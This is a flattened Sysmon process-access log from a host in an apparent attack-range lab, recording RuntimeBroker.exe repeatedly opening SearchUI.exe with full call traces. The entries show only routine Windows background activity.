13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11165296C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41550|C:\Windows\system32\windows.cortana.Desktop.dll+9248|C:\Windows\system32\windows.cortana.Desktop.dll+12c21|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011867Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11165504C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+fd3d6|C:\Windows\System32\windows.storage.dll+fed38|C:\Windows\system32\windows.cortana.Desktop.dll+f90c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000011866Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11165504C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+669f8|C:\Windows\System32\windows.storage.dll+7b6e4|C:\Windows\System32\windows.storage.dll+17478b|C:\Windows\system32\windows.cortana.Desktop.dll+fbaa|C:\Windows\system32\windows.cortana.Desktop.dll+f80b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba 10341000x800000000000000011865Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11166124C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41838|C:\Windows\system32\windows.cortana.Desktop.dll+164d7|C:\Windows\system32\windows.cortana.Desktop.dll+12c8b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011864Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11165960C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+fd3d6|C:\Windows\System32\windows.storage.dll+fed38|C:\Windows\system32\windows.cortana.Desktop.dll+f90c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000011863Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11166124C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41550|C:\Windows\system32\windows.cortana.Desktop.dll+9248|C:\Windows\system32\windows.cortana.Desktop.dll+12c21|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011862Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11165960C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+669f8|C:\Windows\System32\windows.storage.dll+7b6e4|C:\Windows\System32\windows.storage.dll+17478b|C:\Windows\system32\windows.cortana.Desktop.dll+fbaa|C:\Windows\system32\windows.cortana.Desktop.dll+f80b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba 10341000x800000000000000011861Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11165504C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+fd3d6|C:\Windows\System32\windows.storage.dll+fed38|C:\Windows\system32\windows.cortana.Desktop.dll+f90c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000011860Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11166028C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41838|C:\Windows\system32\windows.cortana.Desktop.dll+164d7|C:\Windows\system32\windows.cortana.Desktop.dll+12c8b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011859Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11166028C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41550|C:\Windows\system32\windows.cortana.Desktop.dll+9248|C:\Windows\system32\windows.cortana.Desktop.dll+12c21|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011858Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11165504C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+669f8|C:\Windows\System32\windows.storage.dll+7b6e4|C:\Windows\System32\windows.storage.dll+17478b|C:\Windows\system32\windows.cortana.Desktop.dll+fbaa|C:\Windows\system32\windows.cortana.Desktop.dll+f80b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba 10341000x800000000000000011857Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11165876C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+fd3d6|C:\Windows\System32\windows.storage.dll+fed38|C:\Windows\system32\windows.cortana.onecore.dll+15d2f|C:\Windows\system32\windows.cortana.onecore.dll+15e27|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4 10341000x800000000000000011856Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11166120C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41838|C:\Windows\system32\windows.cortana.Desktop.dll+164d7|C:\Windows\system32\windows.cortana.Desktop.dll+12c8b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011855Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11166004C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+fd3d6|C:\Windows\System32\windows.storage.dll+fed38|C:\Windows\system32\windows.cortana.Desktop.dll+f90c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000011854Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11166120C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41550|C:\Windows\system32\windows.cortana.Desktop.dll+9248|C:\Windows\system32\windows.cortana.Desktop.dll+12c21|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011853Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11166004C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+669f8|C:\Windows\System32\windows.storage.dll+7b6e4|C:\Windows\System32\windows.storage.dll+17478b|C:\Windows\system32\windows.cortana.Desktop.dll+fbaa|C:\Windows\system32\windows.cortana.Desktop.dll+f80b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba 10341000x800000000000000011852Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11165980C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41838|C:\Windows\system32\windows.cortana.Desktop.dll+164d7|C:\Windows\system32\windows.cortana.Desktop.dll+12c8b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011851Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11165980C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41550|C:\Windows\system32\windows.cortana.Desktop.dll+9248|C:\Windows\system32\windows.cortana.Desktop.dll+12c21|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011850Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11165976C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41838|C:\Windows\system32\windows.cortana.Desktop.dll+164d7|C:\Windows\system32\windows.cortana.Desktop.dll+12c8b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011849Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11165976C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41550|C:\Windows\system32\windows.cortana.Desktop.dll+9248|C:\Windows\system32\windows.cortana.Desktop.dll+12c21|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011848Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 